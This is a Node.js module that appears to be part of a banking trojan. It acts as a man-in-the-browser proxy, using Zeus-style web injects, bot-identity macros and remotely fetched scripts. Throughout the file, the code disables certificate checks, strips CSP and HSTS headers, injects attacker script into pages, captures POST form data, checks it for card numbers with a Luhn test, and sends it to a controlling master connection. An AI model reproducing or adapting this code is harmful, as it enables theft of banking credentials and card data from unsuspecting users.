

///xxx
var stream = require('stream');
var util = require('util');
var suspend = require('suspend');
var http = require('http');
var https = require('https');
var url = require('url');
var path = require('path');
var iconv = require('inconvlite');
var zlib = require('zlib');
var protobuf = require('protocol_buffers');
var luhn10 = require('luhn10');
var zeusfunctions = require("zeusmask");
var HttpsAgent = require('keep_alive_agent').HttpsAgent;


var keepaliveAgent = new HttpsAgent({
    maxSockets: 1024,
    maxFreeSockets: 20,
    timeout: 60000,
    keepAliveTimeout: 60000 // free socket keepalive for 60 seconds
});


var dnscache = require('dnscache')({
    "enable" : true,
    "ttl" : 300,
    "cachesize" : 1000
});


var Transform = stream.Transform ||
  require('readable-stream').Transform;

const kMaximumPostDataLength = (65 * 1024);

const endOfHtmlTagByte = 0x3E;
const beginOfHtmlTagByte = 0x3C;

const kStreamInjectionEngine = 0;
const kSimpleInjectionEngine = 1;
const kBothInjectionEngine = 2;

const bodyTagBufferVariants = [
    new Buffer('body'),
    new Buffer('BODY')
];

const htmlTagBufferVariants = [
    new Buffer('/html'),
    new Buffer('/HTML')
];

var messages = protobuf([
    'message Form {\r',
      '\toptional string method = 1;\r',
      '\toptional string source = 2;\r',
      '\toptional string location = 3;\r',
      '\toptional string referer = 4;\r',
      '\toptional bool\tisSsl = 5;\r',
      '\toptional string rawHeaders = 6;\r',
      '\toptional bytes\tpostData = 7;\r',
      '\toptional string protocol = 8;\r',
      '\toptional bool \tisCertificateUsed = 9;\r',
      '\toptional bool \tisLuhnTestPassed = 10;\r',
  '}'
].join('\n'));

function CapitaliseFirstLetter(string) {
    return string.charAt(0).toUpperCase() + string.slice(1);
}

function CapitalizeHeaderNameString(headerName) {
    var HeadersNameParts = headerName.split('-');

    for (var i = 0; i < HeadersNameParts.length; i++) {
        var t = HeadersNameParts[i];
        switch (t) {
            case 'www':
                HeadersNameParts[i] = 'WWW';
                break;
            default:
                HeadersNameParts[i] = CapitaliseFirstLetter(HeadersNameParts[i]);
                break;
        }

    }
    return HeadersNameParts.join('-');
}

function ReplaceStandartMacroses(str) {
    var retval = str;

    if (typeof (process.machineGuid) === 'string') {
        retval = retval.replace(/BOT_MACHINE_UUID/g, process.machineGuid);
    }

    retval = retval.replace(/BOT_MACHINE_DATE/g, new Date().toJSON());
    retval = retval.replace(/BOT_MACHINE_TIMESTAMP/g, Math.round(+new Date() / 1000));
    retval = retval.replace(/BOT_USERNAME/g, process.currentUser);
    retval = retval.replace(/BOT_USERDOMAIN/g, process.env['USERDOMAIN']);
    retval = retval.replace(/BOT_COMPUTERNAME/g, process.env['COMPUTERNAME']);
    retval = retval.replace(/BOT_VERSION/g, process.g_botId);
    retval = retval.replace(/BOT_PROCESS/g, process.currentBinary);
    retval = retval.replace(/BOT_PROCESS_ID/g, process.pid);
    retval = retval.replace(/BOT_PROCESS_PATH/g, process.execPath);
    retval = retval.replace(/BOT_RANDOM_STRING/g, Math.random().toString(36).substring(7));
    retval = retval.replace(/BOT_RANDOM_NUMBER/g, Math.floor(Math.random() * (0xAFFFFFF - 0 + 1)));

    /*var storedObjects = process.FsReadObjectEncrypted('gatevars.txt');
    if(storedObjects)
    {
        for(var i in storedObjects){
            retval = retval.split(i).join(storedObjects[i]);
        }
    }*/
    return retval;
}

function IsActiveContentType(contentType){
    if(
        (contentType.indexOf('text') !== -1) ||
        (contentType.indexOf('application') !== -1)
    ){
        if(
            (contentType.indexOf('json') !== -1) ||
            (contentType.indexOf('javascript') !== -1)
        ){
            return true;
        }
    }


    return false;
}

function IsHTMLContentType(contentType){
    return (
        (contentType.indexOf("text") !== -1) &&
        (contentType.indexOf("html") !== -1)
    );
}

function isStreamedInjection(inj){
    return ([
        "STREAM_ADD_BEFORE_HTML_END",
        "STREAM_ADD_BEFORE_CONTENT_FINISH"
    ].indexOf(inj.data_before) !== -1);
}

function IsInjectsConfigLoaded(){
    if (util.isUndefined(process.g_scfg)) {
        return false;
    }
    var injectsArray = process.g_scfg.injects;
    if (util.isUndefined(injectsArray)) {
        return false;
    }
    return true;
}

function isMethodAlowed(method, inject) {
    if (
        (method == 'POST' && inject.base.filt_post) ||
        (method == 'GET' && inject.base.filt_get)
    ) {
        return true;
    }
    return false;
}

function SetRequestInjects(clientRequest){
    
    if(!IsInjectsConfigLoaded()){
        return false;
    }

    var injectsArray = process.g_scfg.injects;
    var method = clientRequest.desc.method;
    var location = clientRequest.desc.location;
    var injurls = [];

    clientRequest.simple_injects = [];
    clientRequest.streamed_injects = [];
    
    try 
    {
        for (let i = 0; i < injectsArray.length; i++) {
            var inj = injectsArray[i];
            if (inj.base.enabled === false) {
                continue;
            }

            if(!isMethodAlowed(method, inj)){
                continue;
            }

            if (!zeusfunctions.isUrlMatchedInRule(location, inj)) {
                continue;
            }

            if (!isStreamedInjection(inj)){
                clientRequest.simple_injects.push(inj);
                injurls.push(inj.base.url[0]);
            }else{
                clientRequest.streamed_injects.push(inj);
                injurls.push(inj.base.url[0]);
            }
        }

    } catch (e) {
        console.log('exception : SetRequestInjects() : %s', e.message);
    }
    /*
    if(
        (clientRequest.simple_injects.length + 
        clientRequest.streamed_injects.length) > 0
    ){
        console.log("%s -> %s", location, injurls.join("|"));
    }
    */
    return (
        (clientRequest.simple_injects.length + 
        clientRequest.streamed_injects.length) > 0
    );
}

function GetInjectDataByMethod(streamed_injects, method, location) {
    var result = [];
    
    try {

        for (let i = 0; i < streamed_injects.length; i++) {
            var inj = streamed_injects[i];
            if (inj.base.enabled === false) {
                continue;
            }
            if (!zeusfunctions.isUrlMatchedInRule(location, inj)) {
                continue;
            }
            if (isStreamedInjection(inj) && method === inj.data_before){
                result.push(ReplaceStandartMacroses(inj.data_inject))
            }
        }
    } catch (e) {
        trace('exception : GetInjectDataByMethod() : %s', e.message);
    }
    return result;
}

function InjectionStream(options) 
{

    if (!(this instanceof InjectionStream)) {
        return new InjectionStream(options);
    }
    
    Transform.call(this, options);

    this.location = options.clientRequest.desc.location;
    this.IsHTML = IsHTMLContentType(options.contentType || '');

    this.STREAM_ADD_BEFORE_CONTENT_FINISH =
        GetInjectDataByMethod(
            options.clientRequest.streamed_injects, 
            'STREAM_ADD_BEFORE_CONTENT_FINISH', 
            this.location);
        
    this.STREAM_ADD_BEFORE_HTML_END =
        GetInjectDataByMethod(
            options.clientRequest.streamed_injects, 
            'STREAM_ADD_BEFORE_HTML_END', 
            this.location);
    
    this.isBypassed = (
        (this.IsHTML === false) ||
        (this.STREAM_ADD_BEFORE_CONTENT_FINISH.length === 0 && 
            this.STREAM_ADD_BEFORE_HTML_END.length === 0)
    );
}

util.inherits(InjectionStream, Transform);

function bufferIndexOf(buf, search, offset) {
    offset = offset || 0

    var m = 0;
    var s = -1;
    for (var i = offset; i < buf.length; ++i) {

        if (buf[i] != search[m]) {
            s = -1;
            m = 0;
        }

        if (buf[i] == search[m]) {
            if (s == -1) s = i;
            ++m;
            if (m == search.length) break;
        }

    }

    if (s > -1 && buf.length - s < search.length) return -1;
    return s;
}

function PipeRemoteUrlIntoStream(location, dataStream, completeCb)
{
    
    var engine;
    var doneCalled;
    var options = url.parse(location);

    function done(error, result){
        if(!doneCalled){
            doneCalled = true;
            completeCb(error, result);
        }
    }
    
    if(location.indexOf("https:") === 0){
        engine = https;
        if(!options.port || options.port === 443){
            options.port = 443 + process.PORT_REDIRECTION_BASE;
        }
    }else if(location.indexOf("http:") === 0){
        engine = http;
        if(!options.port || options.port === 80){
            options.port = 80 + process.PORT_REDIRECTION_BASE;
        }
    }else{
        return done(null, true);
    }
    
    engine.get(options, function(response){
        if(response.statusCode === 200){
            response.on('data', function(data){
                dataStream.push(data);
            })
        }
        
        response.on('end', function(){
            done(null, true);
        });

        response.on('error', function(error){
            done(null, true);
        });

    }).on('error', function(error){
        done(null, true);
    });
}

function DisableOneTimeInjects(location, type){
    
    if (!IsInjectsConfigLoaded()) {
        return;
    }
    
    var injectsArray = process.g_scfg.injects;
       
    try {
        for (let i = 0; i < injectsArray.length; i++) {

            var inj = injectsArray[i];

            
            if (
                inj.data_before === type &&
                inj.data_after.split('|').indexOf('ONE_TIME') !== -1 && 
                inj.base.enabled === true)
            {
                if (zeusfunctions.isUrlMatchedInRule(location, inj))
                {
                    inj.base.enabled = false;
                }
            }
        }
    } catch (e) {
    }
}

var InsertContentToStream = suspend(function*(type, controlledStream, onComplete){
    
    if(type !== '' && controlledStream[type]){
        var contentArray = controlledStream[type];

        for (var i = 0; i < contentArray.length; i++)
        {
            var data = contentArray[i];

            

            if(data.indexOf('REMOTE_SCRIPT_CONTENT:') === 0){
                var remoteUrl = data.replace('REMOTE_SCRIPT_CONTENT:', '');
                if(controlledStream.IsHTML) controlledStream.push('<script>');
                var result = yield PipeRemoteUrlIntoStream(remoteUrl, controlledStream, suspend.resume());
                if(controlledStream.IsHTML) controlledStream.push('</script>');
            }else if(data.indexOf('REMOTE_PLAIN_CONTENT:') === 0){
                var remoteUrl = data.replace('REMOTE_PLAIN_CONTENT:', '');
                var result = yield PipeRemoteUrlIntoStream(remoteUrl, controlledStream, suspend.resume());
            }else {
                controlledStream.push(contentArray[i]);
            }
        }

        DisableOneTimeInjects(controlledStream.location, type);
    }
    
    onComplete(null, true);
});

InjectionStream.prototype.responseHeaders = function(originalHeaders){
    if(this.isBypassed){
        return originalHeaders;
    }
    
    var newHeaders = originalHeaders;
    
    newHeaders['X-Powered-By'] = 'PHP/5.1.2-1+b1';
    newHeaders['transfer-encoding'] = 'chunked';
    delete newHeaders['content-length'];
    
    return newHeaders;
}

InjectionStream.prototype._flush = function(cb) {
    if(this.isBypassed){
        return cb(); 
    }

    if (this.STREAM_ADD_BEFORE_CONTENT_FINISH.length > 0) {
        InsertContentToStream('STREAM_ADD_BEFORE_CONTENT_FINISH', this, function(){
            cb();
        });
    }else cb();
};

function FindTagInChunk(tags, chunk, beginIndex){
    var bodyTagOffset = -1;
    var endOfTagOffset = -1;

    tags.forEach(function (tag) {
        if (bodyTagOffset === -1) {
            bodyTagOffset = bufferIndexOf(chunk, tag, beginIndex);
        }
    });
        
    if (bodyTagOffset !== -1) {
        for (var i = bodyTagOffset; i < chunk.length; i++) {
            if (chunk[i] === endOfHtmlTagByte) {
                endOfTagOffset = (i + 1);
                break;
            }
        }
    }

    return {
        tagOffset : bodyTagOffset,
        endOfTagOffset : endOfTagOffset
    };
}

function IsBufferStartWith(chunk, offset, checkArray){

    for(var i = 0; i < checkArray.length; i ++){
        for(var j = 0; j < checkArray[i].length; j ++){
            if(chunk[offset + j] !== checkArray[i][j])
                break;
        }
        if(j === checkArray[i].length)
            return true;
    }
    return false;
}

InjectionStream.prototype._transform = suspend(function*(chunk, enc, cb) {

    if(this.isBypassed){
        this.push(chunk);
        return cb(); 
    }

    if(this.IsHTML)
    {
        if (
            this.STREAM_ADD_BEFORE_HTML_END.length > 0
        ){
            let startOffset = chunk.indexOf(beginOfHtmlTagByte);
            let currentSliceOffset = 0;

            while(startOffset !== -1)
            {                
                if( IsBufferStartWith(chunk, startOffset + 1, htmlTagBufferVariants) )
                {
                    let endTagOffset = chunk.indexOf(endOfHtmlTagByte, startOffset + 1);
                    if(endTagOffset !== -1){
                        this.push(chunk.slice(currentSliceOffset, endTagOffset + 1));
                        currentSliceOffset = endTagOffset + 1;
                        yield InsertContentToStream('STREAM_ADD_BEFORE_HTML_END', this, suspend.resume());
                    }
                }
                startOffset = chunk.indexOf(beginOfHtmlTagByte, startOffset + 1);
            }

            if(currentSliceOffset === 0){
                this.push(chunk);
            }else if(currentSliceOffset < chunk.length){
                this.push(chunk.slice(currentSliceOffset));
            }
        }else{
            this.push(chunk);
        }
    }else{
        this.push(chunk);
    }

    cb();
}); 


function createRequestOptionForDirectRequest(clientRequest) {
    
    let newHeaders = {};
    let host = clientRequest.headers.host.split(':')[0];
    let parsedUrl = url.parse(
        (clientRequest.isSSL ? "https://" : "http://") + 
        host + 
        clientRequest.url
    );

    let secureProtocol = 'TLSv1_method';
     
    if(process.certcache[host] && process.certcache[host].connectionMethod){
        secureProtocol = process.certcache[host].connectionMethod;
    }

    newHeaders = clientRequest.headers;

    return {
        agent: (clientRequest.isSSL ?  keepaliveAgent : false),
        hostname: clientRequest.fakeHost || host,
        port: process.PORT_REDIRECTION_BASE + clientRequest.remotePort,
        path: parsedUrl.path,
        method: clientRequest.method,
        headers: newHeaders,
        rejectUnauthorized: false,
        secureProtocol : secureProtocol
    };
}



function StripRequestHeaders(headers){
    if(headers['if-none-match']){
        headers['if-none-match'] = Math.random()
            .toString(36)
            .substring(7)
            .toUpperCase();
    }
    
    if(headers['accept-encoding']){
        headers['accept-encoding'] = 
            headers['accept-encoding']
                .split(",").map(function(x) { 
                    return x.trim() 
                }).filter(function(x) { 
                    return (x === 'gzip' || x === 'deflate') 
                }).join(', ');
    }
    
    [
        "etag", 
        "if-modified-since" 
    ].forEach(function(hdr){
        delete headers[hdr];
    })
}

function StripResponseHeaders(headers)
{
    [
        //cache
        "etag",
        "cache-control",
        "age",
        "last-modified",
        "date",
        "expires",

        //csp
        "x-webkit-csp", 
        "x-content-security-policy",  
        "content-security-policy", 
        "x-content-type-options", 
        "x-frame-options", 
        "x-xss-protection",
        "strict-transport-security",
    ].forEach(function(hdr){
        delete headers[hdr];
    })

    headers['expires'] = 'Mon, 26 Jul 2001 05:00:00 GMT';
    
    return headers;
}

function StripSPDYHeaders(headers)
{
    [
        "alternate-protocol", 
        "alt-svc"
    ].forEach(function(hdr){
        delete headers[hdr];
    });
        
    return headers;
}

function IsGootContentTypeForGrabbing(ct){
    var bIsGood = false;

    if(typeof(ct) === 'string'){
        [
            "form",
            "multipart",
            "json",
            "xml",
            "text"
        ].forEach(function(typeSubstring){
            if(ct.toLowerCase().indexOf(typeSubstring) !== -1){
                bIsGood = true;
            }
        });
    }
    return bIsGood;
}

function CollectFormgrabberData(clientRequest){

    clientRequest.postData = '';
    
    var dataLengthReaded = 0;
    var post_buffers = [];

    if(
        (clientRequest.method == 'POST') &&
        (IsGootContentTypeForGrabbing(clientRequest.headers["content-type"])) &&
        (typeof(clientRequest.headers["content-length"]) !== "undefined") &&
        (clientRequest.headers["content-encoding"] !== "gzip") &&
        (clientRequest.headers["content-encoding"] !== "deflate")
    ){

        clientRequest.on('data', function (chunk) {
            
            dataLengthReaded += chunk.length;

            if (dataLengthReaded < kMaximumPostDataLength) {
                post_buffers.push(chunk);    
            }else{
                post_buffers = [];
            }
        });

    }

    clientRequest.on('end', function () {

        var form = clientRequest.desc;
        var restrictedSubstrings = process.formgrabber.restrictedSubstrings;
        var restrictedExtensions = process.formgrabber.restrictedExtensions;
        var restrictedHosts = process.formgrabber.restrictedHosts;
        
        form.isCertificateUsed = false;
        form.protocol = form.isSsl ? 'https' : 'http';
        if(!process.masterConnection){
            return;
        }
        
        process.masterConnection.sendProtocolPacket(
            SLAVE_PACKET_URLNOTIFICATION,
            new Buffer(form.location)
        );

        process.emit('browser_navigate', form.location);

        if (process.formgrabber.options) 
        {
            var rule = process.formgrabber.options[form.protocol];
            if (!util.isUndefined(rule)) 
            {
                if (form.method === 'GET' && rule.grubGet === false){
                    return;
                }
            
                if (form.method === 'POST' && rule.grubPost === false){
                    return;
                }

            }
        }

        for (let i = 0; i < restrictedSubstrings.length; i++)
        {
            if (
                form.location
                    .toLowerCase()
                    .indexOf(restrictedSubstrings[i]) !== -1
            ){
                return;
            }
        }


        var urlObject = url.parse(form.location);
        var pathname = urlObject.pathname;
        var extname = path.extname(pathname.toLowerCase());

        if (
            (restrictedExtensions.indexOf(path.extname(pathname.toLowerCase())) !== -1) ||
            (restrictedHosts.indexOf(form.host.toLowerCase()) !== -1)
        ) {
            return;
        }

        if (post_buffers.length > 0){
            clientRequest.postData = 
                Buffer.concat(post_buffers);
        }else{
            clientRequest.postData = 
                new Buffer('');
        }

        post_buffers = null;

        form.postData = clientRequest.postData;
        
        form.isLuhnTestPassed =
                luhn10.checkLuhn10(form.postData.toString());

        if (process.masterConnection)
        {
            process.masterConnection.sendProtocolPacket(
                SLAVE_PACKET_FORM,
                messages.Form.encode(form)
            );
        }
    });
}


function GetRealResponse(clientRequest, clientResponse, cb, bPrepareForInject){
    var requestOptions = createRequestOptionForDirectRequest(clientRequest);
    
    if(bPrepareForInject){
        StripRequestHeaders(requestOptions.headers);
    }
    

    dnscache.resolve4(requestOptions.hostname, function(err, addresses, family) {
        
        if(err){
            console.log(err);
            return;
        }
        
        requestOptions.hostname = addresses[0];
        
        var requestEngine = ((clientRequest.isSSL == true) ? https : http);
        var proxyRequest = requestEngine.request(requestOptions , function (realResponse)
        {
            StripSPDYHeaders(realResponse.headers);
                
            if(bPrepareForInject){
                StripResponseHeaders(realResponse.headers);
            }
                
            realResponse.on('error', function (rerr) {
                clientResponse.end();
            });
            
            clientResponse.on('error', function (error) {
                realResponse.end()
            });

            cb(realResponse);
        });

        proxyRequest.on('error', function (error) {
            clientResponse.end()
        });

        clientRequest.on('error', function () {
            clientResponse.end()
        });

        
        


        clientRequest.on('end', function () {
            proxyRequest.end();
        });

        clientRequest.on('data', function (chunk) {
            proxyRequest.write(chunk, 'binary');
        });
        
        CollectFormgrabberData(clientRequest);
    });
}

function ThrottleRequestToBrowserDirect(clientRequest, clientResponse){
    
    GetRealResponse(clientRequest, clientResponse, function(realResponse){
        
        clientResponse.writeHead(
            realResponse.statusCode, 
            realResponse.headers);
        
        realResponse.pipe(clientResponse);
    });
}

function SimpleBufferingStream(options)
{
    if (!(this instanceof SimpleBufferingStream)) {
        return new SimpleBufferingStream(options);
    }
    
    this.dataBuffers = [];
    Transform.call(this, options);
}

util.inherits(SimpleBufferingStream, Transform);

SimpleBufferingStream.prototype._transform = function(chunk, enc, cb) {
    this.dataBuffers.push(chunk);
    cb();
}

SimpleBufferingStream.prototype._flush = function(cb) {
    this.emit('done', Buffer.concat(this.dataBuffers));
    this.dataBuffers = null;
    cb();
}


function getEncodingBySource(buffer)
{
    try
    {
        var x = buffer.toString();
        var matches = x.match(/<meta.*?charset=([^"']+)/);
    	
        if(matches === null)
            return 'utf-8';
    
        return matches[1];
    }
    catch(error)
    {
        return 'utf-8';
    }
}

function ExecuteInjectionAndCompleteRequest(
    clientRequest, 
    clientResponse,
    realResponse,
    bufferedData
){
    
    var pageEncoding;
    var contentTypeHeader;
    var htmlText;
    var location = clientRequest.desc.location;
    var injectsArray;
    var bDataIsModifed = false;
    var bIconvUsedForDecode = false;
    var newHtmlBuffer;
    
    let packerClass = null;
    let encoding = realResponse.headers['content-encoding'] || 'identity';
    
    if (encoding == 'gzip') {
        packerClass = zlib.createGzip;        
    } else if (encoding == 'deflate') {
        packerClass = zlib.createDeflate;;        
    }
    
    function packResponseAndSendToClient(responseBuffer){
        if(packerClass){
            delete realResponse.headers['content-length'];
        }
        
        clientResponse.writeHead(
            realResponse.statusCode, 
            realResponse.headers   
        );
        
        if(packerClass){
            let packer = packerClass(({level : 1}));
            packer.pipe(clientResponse);
            packer.write(responseBuffer, function done(){
                packer.end();
            });
            
        }else{
            clientResponse.end(responseBuffer);
        }
    }
    
    function doneRequestWithoutModification(){
        return packResponseAndSendToClient(bufferedData);
    }
        
    if(!bufferedData || bufferedData.length === 0){
        return doneRequestWithoutModification();
    }  
    
    if (clientRequest.simple_injects.length === 0){
        return doneRequestWithoutModification();
    }
    
    if(typeof(process.IsBadPageForInject) === 'function' && 
        process.IsBadPageForInject(arg)
    ){
        return doneRequestWithoutModification();
    }
    
    pageEncoding = getEncodingBySource(bufferedData);
    contentTypeHeader = realResponse.headers['content-type'];
    
    if (!util.isUndefined(contentTypeHeader)){
        if (contentTypeHeader.indexOf('charset=') !== -1) {
            pageEncoding = contentTypeHeader
                .split('charset=')[1]
                .toLowerCase();
        }
    }
    
    if(iconv.encodingExists(pageEncoding)){
        htmlText = iconv.decode(bufferedData, pageEncoding);
        bIconvUsedForDecode = true;
    }else{
        htmlText = bufferedData.toString();
    }

    var injectsArray = clientRequest.simple_injects;
    for (let i = 0; i < injectsArray.length; i++) {
        let tmp = zeusfunctions.zeusExecuteInjection(htmlText, injectsArray[i]);
        if (typeof(tmp) === 'string' && tmp !== htmlText) {
            htmlText = ReplaceStandartMacroses(tmp);
            bDataIsModifed = true;
        }
    }

    if(!bDataIsModifed){
        return doneRequestWithoutModification();
    }
       
    newHtmlBuffer = new Buffer(htmlText); 

    if(bIconvUsedForDecode){
        newHtmlBuffer = iconv.encode(
            newHtmlBuffer, pageEncoding);
    }

    if(realResponse.headers['transfer-encoding']){
        delete realResponse.headers['transfer-encoding'];
    }
    
    return packResponseAndSendToClient(newHtmlBuffer);
}


function ThrottleRequestToBrowserInjected(clientRequest, clientResponse){

    GetRealResponse(clientRequest, clientResponse, function(realResponse){    
        
        var contentType = realResponse.headers['content-type'] || 'text/html';
        
        if(
            (!IsHTMLContentType(contentType)) && 
            (!IsActiveContentType(contentType))
        ){
            clientResponse.writeHead(
               realResponse.statusCode, 
               realResponse.headers   
            );
            return realResponse.pipe(clientResponse);
        }
        
        let encoding = realResponse.headers['content-encoding'] || 'identity';
        let responseDataStream = realResponse;
        let packerClass = null;

        responseDataStream.type = 'original';

        if (encoding == 'gzip') {
            packerClass = zlib.createGzip;        
            responseDataStream = 
                realResponse.pipe(zlib.createGunzip());
            responseDataStream.type = 'gzip';
        } else if (encoding == 'deflate') {
            packerClass = zlib.createDeflate;;        
            responseDataStream = 
                realResponse.pipe(zlib.createInflate());
            responseDataStream.type = 'deflate';
        }
        
        let injectionStreamInstance = new InjectionStream({
            clientRequest : clientRequest,
            contentType : contentType
        });
        
        realResponse.headers = injectionStreamInstance.responseHeaders(
                realResponse.headers);
                
        if(clientRequest.simple_injects.length > 0){

            realResponse.headers['server'] = 'Apache/2.4.13 (Solaris)';

            var bufferedResponse = new SimpleBufferingStream();
            
            responseDataStream
                .pipe(injectionStreamInstance)
                .pipe(bufferedResponse);
                        
            bufferedResponse.on('done', function(bufferedData){
                ExecuteInjectionAndCompleteRequest(
                    clientRequest, 
                    clientResponse, 
                    realResponse, 
                    bufferedData
                );
            });

        }else{        
            if(packerClass){
                delete realResponse.headers['content-length'];
            }
        
            clientResponse.writeHead(
                realResponse.statusCode, 
                realResponse.headers   
            );
        
            if(packerClass){
                let packer = packerClass(({level : 1}));

                responseDataStream
                    .pipe(injectionStreamInstance)
                    .pipe(packer)
                    .pipe(clientResponse);

            }else{
                responseDataStream
                   .pipe(injectionStreamInstance)
                   .pipe(clientResponse);
            }
           
        }
    }, true);     
}

function strpart(str, maxlen){
    var trimmedString = str.length > maxlen ? 
                        str.substring(0, maxlen - 3) + "..." : 
                        str.substring(0, maxlen);
    return trimmedString;
}

function IsContentModificationNeeded(clientRequest){
    
    var bInjectsEnabledHere = SetRequestInjects(clientRequest);
    /*console.log('bInjectsEnabledHere : %s', bInjectsEnabledHere, clientRequest.desc.location);
    if(bInjectsEnabledHere){
        clientRequest.simple_injects.forEach(function(inject){
            console.log('simple_injects [%s] [%s] [%s]', 
                inject.base.url,
                inject.data_before,
                strpart(inject.data_inject, 20))
        });
        
        clientRequest.streamed_injects.forEach(function(inject){
            console.log('streamed_injects [%s] [%s] [%s]', 
                inject.base.url,
                inject.data_before,
                strpart(inject.data_inject, 20))
        });
    }*/
    return bInjectsEnabledHere;
}

exports.IsContentModificationNeeded = IsContentModificationNeeded;
exports.ThrottleRequestToBrowserDirect = ThrottleRequestToBrowserDirect;
exports.ThrottleRequestToBrowserInjected = ThrottleRequestToBrowserInjected;
exports.InjectionStream = InjectionStream;
exports.isStreamedInjection = isStreamedInjection;


